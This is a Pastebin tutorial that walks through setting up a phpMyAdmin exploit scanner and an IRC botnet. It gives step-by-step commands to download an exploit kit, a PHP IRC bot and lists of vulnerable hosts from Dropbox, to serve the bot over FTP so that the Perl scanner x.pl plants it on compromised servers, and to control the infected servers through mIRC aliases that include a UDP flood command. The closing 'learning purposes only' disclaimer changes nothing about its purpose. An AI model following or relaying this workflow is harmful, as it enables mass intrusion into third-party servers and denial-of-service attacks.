Not a member of Pastebin yet?
                        Sign Up,
                        it unlocks many cool features!                    
                - -=|--------------------------------------------------|=-
 - -=| PMA - PhpMyAdmin Exploit |=-
 - -=| Tutorial By -@fuckSDN |=-
 - -=|-----------------------------------------------------|=-
 - -=|This Tutorial Explains Everything You Need!! |=-
 - -=|-----------------------------------------------------|=-
 - ================================
 - -[What You Need]-
 - 1. A IRC Server Running
 - 2. VPS Server
 - 3. Basic Linux Knowledge
 - ================================
 - ?> Step 1: Log Into Your VPS Server As root.
 - ?> Step 2: Run This List Of CMD's 1 At A Time;
 - ""
 - yum update -y
 - yum install wget -y
 - yum install nano -y
 - yum install unrar -y (if this does not download type;
 - "wget h t t p : / / pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.2-2.el6.rf.i686.rpm"
 - "rpm -Uvh rpmforge-release-0.5.2-2.el6.rf.i686.rpm"
 - yum install gcc -y
 - yum install perl* -y
 - yum install python* -y
 - yum install cpan -y
 - ""
 - ?> Step 3: Type the Cmd "cpan"
 - ?> Step 4: Install All These Modules 1 At A Time;
 - ""
 - install Parallel::ForkManager
 - install URI::_foreign
 - install LWP
 - install Time::HiRes
 - install MIME::Base64
 - ""
 - ?> Step 5: Type This CMD "wget
 - w w w . dropbox.com/s/0frhu4wkvoo819l/pma.rar"
 - ?> Step 6: Type "unrar x pma.rar"
 - ?> Step 7: Now Login To Your IRC Hosting Server
 - ?> Step 8: Type In "yum install vsftpd -y" and then type "service vsftpd start"
 - ?> Step 9: Check If The FTP Is Online Go To Your Browser And Type In ftp://(PUT YOUR IRC IP HERE) and click enter an index should show.
 - ?> Step 10: Go Back To Your IRC Server Type In "cd /var/ftp/pub" then "wget w w w . dropbox.com/s/6noagiee994pl0v/bot.php"
 - ?> Step 11: Type "nano bot.php" And Use The Arrow Keys To Find A Spot In Near The Top Of The Code That Looks Like This
 - ""
 - class pBot
 - {
 - var $config = array("server"=>"IRC SERVER IP HERE", "port"=>"IRC PORT","key"=>"","prefix"=>"FBI", "maxrand"=>"6", "chan"=>"#IRC CHANNEL","trigger"=>"-","hostauth"=>"FBI.gov");
 - ""
 - ?> Step 12: Change The IP, Port, Channel To Your Information That You Set *Note The Channel Can Be What You Want The Bots To Join.
 - ?> Step 13: After You Have Correctly Changed All The Formation Do CMD "CTRL+X" And The "y" "enter" to save.
 - ?> Step 14: Change Back Over To The Server We Started On the Server We're Setting PMA On.
 - ?> Step 15: Type "cd pma"
 - ?> Step 16: On Your Browser Go Onto Your IRC FTP And Refresh And Click "pub/" and then click "bot.php"
 - ?> Step 17: Once You're On Your Bot You Should See The Code In The Browser Copy The Bot URL e.g. " f t p : //1.1.1.1/pub/pma_bot.php"
 - ?> Step 18: Go Onto Your PMA VPS And Type "nano x.pl" and find a line of code that looks like this
 - ""
 - my $ftp = "PUT YOUR FTP LINK HERE"; #put your ftp link here
 - ""
 - ?> Step 19: Paste Your FTP Link There And Then Press "CTRL+X" "y" "enter"
 - ?> Step 20: Open MIRC and Connect To Your IRC and Open Script Editor and Paste In Aliases
 - ""
 - /400 /samode $chan +q $me | /samode $chan +o $me | /names $chan
 - /udp /say -udp $$?="ip" $$?="port" $$?="time" $$?="packetsize"
 - ""
 - ?> Step 21: On Your PMA VPS Type "cd pma" and then "wget w w w . dropbox.com/s/i8lgzce6yq09jpc/vuln.rar"
 - ?> Step 22: Type in "unrar e vuln.rar"
 - ?> Step 23: Now You Have Setup PMA To Start Scanning Lists Type "ls" To View All The Files Then Type "perl x.pl (list) -x"
 - ""
 - (list) = any vuln there e.g. crazy_vuln.txt
 - ""
 - ?> Step 24: To View The Bots Coming In Join The Channel You Set Them To Join "/join #(whatever)" Then Type "/400"
 - ###################################################
 - This Has Been For Learning Purposes Only. I Do Not Take Any Responsibility For What You Do With It!
 - Contact me: sinden@riseup(dot)net
 - Tweet @ Me @fuckSDN
 
                    Add Comment                
                
                        Please, Sign In to add comment